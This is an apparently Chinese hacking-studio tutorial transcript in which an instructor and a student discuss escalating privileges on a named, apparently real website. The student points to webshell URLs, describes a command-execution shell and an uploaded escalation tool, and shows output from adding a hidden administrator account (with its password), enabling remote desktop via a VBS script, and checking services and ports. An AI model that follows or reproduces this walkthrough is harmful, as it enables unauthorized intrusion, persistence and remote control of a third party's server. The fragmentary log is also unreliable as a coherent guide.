╭──────────────────────────╮
  猫客工作室--真诚、高效、创新，敢想敢做努力做到最好！ 
╰──────────────────────────╯

>讲师名称：剑眉大侠（QQ767501681）

>动画名称：实战提权学员（bolin）给的shell



学员|bolin  15:30:02
师傅，我遇到一个奇葩- -
剑眉大侠  15:30:32
0..

学员|bolin  15:30:44
支持aspx，但是上aspx大马却解析不了
然后上cmd aspx 执行可以打开

学员|bolin  15:31:16
   开了3306.但是找不到mysql --
  - -师傅提权下吧  - -
剑眉大侠  15:31:35
发
学员|bolin  15:31:37
http://www.gongpin.net/2.aspx    
http://www.gongpin.net/blog/indx.asp
helloworld
剑眉大侠  15:32:27
这个aspx cmd都可以执行

肯定不是不解析aspx
学员|bolin  15:32:34
是的
但是aspx不能执行
他过滤了那个马子
分析特征过滤了aspx脚本木马吧 - -应该是这样
上传了pr，但是添加用户的时候被杀了
学员|bolin  15:33:34

C:\wmpub  可读可写目录
剑眉大侠  15:33:38
你没看进程么

看看有什么杀软
学员|bolin  15:33:45
   - -看了  -
表示没看到杀软 -- 
剑眉大侠  15:33:53
有什么

。。。。。。。。。。。。。。。
学员|bolin  15:34:05
 真心没看到杀软- - 



ASPNET                   Gongpin                  gongpinads               
GongpinVPN               Guest                    IUSR_FAIRY-TAIL          
IWAM_FAIRY-TAIL          SUPPORT_388945a0         
命令成功完成。


   -a                  add user(admin$/GuiWAng!@#9bd*) to admin group


[INFO] add user ok
[INFO] execute over

本地组成员             *Administrators   


admin$/GuiWAng!@#9bd*

/c "C:\wmpub\cscript.exe" C:\wmpub\3389.vbs

查看正在运行的服务：tasklist /svc

svchost.exe                   3600 TermService   
 
查看开放的所有端口：netstat -ano 

TCP    0.0.0.0:6353           0.0.0.0:0              LISTENING       3600